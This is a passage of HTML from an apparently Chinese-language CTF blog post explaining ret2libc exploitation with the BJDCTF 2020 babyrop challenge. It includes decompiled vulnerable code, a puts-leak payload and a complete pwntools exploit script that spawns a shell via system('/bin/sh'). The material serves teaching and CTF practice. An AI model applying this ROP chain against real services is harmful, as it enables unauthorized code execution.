style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6cc4\u9732\u51fa\u771f\u5b9e\u5730\u5740\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7<code>LibcSearcher<\/code>\u5e93\u6216\u8005<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u6765\u627e\u5230\u5bf9\u5e94\u7684libc\u7248\u672c\uff08\u9664\u975e\u9898\u76ee\u7ed9\u4e86\uff09\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5730\u5740\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u6784\u9020\u51fa<code>system(\"\/bin\/sh\")<\/code>\u6765\u83b7\u53d6shell\u4e86\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[BJDCTF 2020]babyrop<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/707\">BJDCTF 2020-babyrop | NSSCTF<\/a><\/p>\n\n\n\n<p>\u901a\u8fc7IDA\u6253\u5f00\u7a0b\u5e8f\u53ef\u4ee5\u770b\u89c1\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"378\" height=\"347\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-152\"  sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u8fd9\u91cc\u5e76\u6ca1\u6709<code>system<\/code>\u51fd\u6570\uff0cchecksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"234\" height=\"108\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-153\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u65e2\u6ca1\u6709Canary\u4e5f\u6ca1\u6709PIE\u4fdd\u62a4\uff0c\u6240\u4ee5\u5224\u65ad\u9700\u8981\u901a\u8fc7ret2libc\u6765\u83b7\u53d6shell\uff0c\u53ef\u4ee5\u770b\u5230<code>vuln<\/code>\u51fd\u6570\u5185\u5bb9\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>ssize_t vuln()\n{\n  char buf&#91;32&#93;; \/\/ &#91;rsp+0h&#93; &#91;rbp-20h&#93; BYREF\n\n  puts(\"Pull up your sword and tell me u story!\");\n  return read(0, buf, 0x64uLL);\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">ssize_t<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">vuln<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #B48EAD\">32<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #616E88\"> \/\/ &#91;rsp+0h&#93; &#91;rbp-20h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">read<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">64<\/span><span style=\"color: #81A1C1\">uLL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u660e\u663e<code>read<\/code>\u51fd\u6570\u5b58\u5728\u6ea2\u51fa\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u6765\u6784\u9020payload\u6765\u6cc4\u9732<code>puts<\/code>\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>puts_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5728\u83b7\u53d6<code>puts<\/code>\u7684\u771f\u5b9e\u5730\u5740\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7<code>LibcSearcher<\/code>\u6765\u627e\u5230\u6240\u6709\u53ef\u80fd\u7684libc\u7248\u672c\uff08\u53ef\u80fd\u8981\u591a\u8bd5\u51e0\u904d\uff09\uff0c\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6cc4\u9732\u591a\u4e2a\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u6765\u4f7f\u7528<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u786e\u5b9alibc\u7684\u7248\u672c\uff1a<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u901a\u8fc7LibcSearcher\u6765\u627e\u5230libc\u7248\u672c<\/h5>\n\n\n\n<p>\u53ef\u4ee5\u5199\u51fa\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \nfrom LibcSearcher import *  \n\np = remote(\"ip\", port)  \nelf = ELF(\".\/pwn\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\nlibc = LibcSearcher(\"puts\", puts_real)  \nlibc_base = puts_real - libc.dump(\"puts\")  \nprint(\"&#91;+&#93; The base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + libc.dump(\"system\")  \nsh = libc_base + libc.dump(\"str_bin_sh\")  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> LibcSearcher <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: 